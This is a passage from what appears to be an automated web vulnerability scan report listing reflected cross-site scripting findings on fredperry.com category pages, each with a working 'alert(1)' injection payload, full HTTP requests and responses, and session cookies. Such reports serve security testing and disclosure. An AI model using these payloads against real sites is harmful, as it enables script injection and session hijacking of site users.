Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women2ad15"-alert(1)-"728545c861/skirts/");
//]]>
...[SNIP]...

1.268. http://www.fredperry.com/women/skirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/skirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f9c8"-alert(1)-"3fa819d4374 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/skirts1f9c8"-alert(1)-"3fa819d4374/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=m60qji43298l5lpmehltqknat7; expires=Tue, 09-Nov-2010 17:09:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/skirts1f9c8"-alert(1)-"3fa819d4374/");
//]]>
...[SNIP]...

1.269. http://www.fredperry.com/women/skirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/skirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f77ce"-alert(1)-"386d0fe9234 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/skirts/?f77ce"-alert(1)-"386d0fe9234=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=8c21fmkpr5eg0k356pfa2pbb66; expires=Tue, 09-Nov-2010 17:07:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/skirts/?f77ce"-alert(1)-"386d0fe9234=1");
//]]>
...[SNIP]...

1.270. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/t-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9b0f"-alert(1)-"ae623475fab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womend9b0f"-alert(1)-"ae623475fab/t-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:44 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j0ul9h5mu39ujejiljj4rrape5; expires=Tue, 09-Nov-2010 17:10:44 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womend9b0f"-alert(1)-"ae623475fab/t-shirts/");
//]]>
...[SNIP]...

1.271. http://www.fredperry.com/women/t-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/t-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb784"-alert(1)-"01ef9dfe59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/t-shirtscb784"-alert(1)-"01ef9dfe59/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:11:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ppmqmsgne1hf0t6hk5mtjo9s20; expires=Tue, 09-Nov-2010 17:11:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/t-shirtscb784"-alert(1)-"01ef9dfe59/");
//]]>
...[SNIP]...

1.272. http://www.fredperry.com/women/t-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/t-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66544"-alert(1)-"f7acbf1dc58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/t-shirts/?66544"-alert(1)-"f7acbf1dc58=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:09:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ha85bn91m4herp3o8gp8d0bhp4; expires=Tue, 09-Nov-2010 17:09:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> T-Shirt
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/t-shirts/?66544"-alert(1)-"f7acbf1dc58=1");
//]]>
...[SNIP]...

1.273. http://www.fredperry.com/women/tennis/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/tennis/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a53c7"-alert(1)-"994703c0c99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womena53c7"-alert(1)-"994703c0c99/tennis/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=fo3o6qv4af1kubaotq1ts943l4; expires=Tue, 09-Nov-2010 17:05:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womena53c7"-alert(1)-"994703c0c99/tennis/");
//]]>
...[SNIP]...

1.274. http://www.fredperry.com/women/tennis/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/tennis/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cf10"-alert(1)-"ad3cd9e9c46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/tennis4cf10"-alert(1)-"ad3cd9e9c46/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:05:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=apfgaeqod633ssa6ckondoiia3; expires=Tue, 09-Nov-2010 17:05:57 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/tennis4cf10"-alert(1)-"ad3cd9e9c46/");
//]]>
...[SNIP]...

1.275. http://www.fredperry.com/women/tennis/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/tennis/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb341"-alert(1)-"426635fe36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/tennis/?bb341"-alert(1)-"426635fe36=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:04:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1123hl90vej508idi45n7idds2; expires=Tue, 09-Nov-2010 17:04:56 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Tennis
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/tennis/?bb341"-alert(1)-"426635fe36=1");
//]]>
...[SNIP]...

1.276. http://www.fredperry.com/women/trousers/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/trousers/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload febe6"-alert(1)-"e4e83b03fd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /womenfebe6"-alert(1)-"e4e83b03fd7/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=gph8cguvj4t1eieejeie3ppq33; expires=Tue, 09-Nov-2010 17:08:29 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/womenfebe6"-alert(1)-"e4e83b03fd7/trousers/");
//]]>
...[SNIP]...

1.277. http://www.fredperry.com/women/trousers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4b5d"-alert(1)-"465b00fb799 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/trousersa4b5d"-alert(1)-"465b00fb799/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:08:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=hbq1jlki9npmfs836p444rlnf0; expires=Tue, 09-Nov-2010 17:08:48 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/trousersa4b5d"-alert(1)-"465b00fb799/");
//]]>
...[SNIP]...

1.278. http://www.fredperry.com/women/trousers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea727"-alert(1)-"53defb14701 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/trousers/?ea727"-alert(1)-"53defb14701=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=f6glm1hr1i5labspr11vtjaf66; expires=Tue, 09-Nov-2010 17:07:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Trouser
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/trousers/?ea727"-alert(1)-"53defb14701=1");
//]]>
...[SNIP]...

1.279. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/woven-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66513"-alert(1)-"6d7e2439d02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women66513"-alert(1)-"6d7e2439d02/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:33 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qvi6uvqv40uokanqel4ccrt0e6; expires=Tue, 09-Nov-2010 17:09:33 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women66513"-alert(1)-"6d7e2439d02/woven-shirts/");
//]]>
...[SNIP]...

1.280. http://www.fredperry.com/women/woven-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3987"-alert(1)-"e15c6a40149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/woven-shirtse3987"-alert(1)-"e15c6a40149/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:10:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pifjben75gbg7vjdt8e2c1rte2; expires=Tue, 09-Nov-2010 17:10:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/women/woven-shirtse3987"-alert(1)-"e15c6a40149/");
//]]>
...[SNIP]...

1.281. http://www.fredperry.com/women/woven-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /women/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dd97"-alert(1)-"328bf5904c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /women/woven-shirts/?5dd97"-alert(1)-"328bf5904c4=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
